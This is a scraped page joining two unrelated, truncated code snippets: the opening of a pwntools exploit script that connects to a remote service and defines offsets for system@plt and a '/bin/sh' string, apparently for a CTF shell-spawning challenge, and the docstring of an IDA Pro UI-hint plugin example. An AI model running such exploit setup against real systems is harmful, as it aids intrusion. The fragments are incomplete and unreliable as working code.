This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from pwn import * | |
_author_ = "ABDELJALIL NOUIRI" | |
r = remote("172.21.2.200",5555) | |
func_offset = 0x0000000000000B30 | |
systemplt_offset = 0x000000000000960 | |
binsh_offset = 0x0000000000001002 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
''' | |
example of: | |
- using ctypes with the IDA SDK | |
- providing custom UI hints with dynamic data from Python | |
in this silly example, we display UI hints with the current timestamp. | |
a more useful plugin might inspect the hovered line, and display some documentation. | |
Author: Willi Ballenthin <william.ballenthin@fireeye.com> | |
Licence: Apache 2.0 |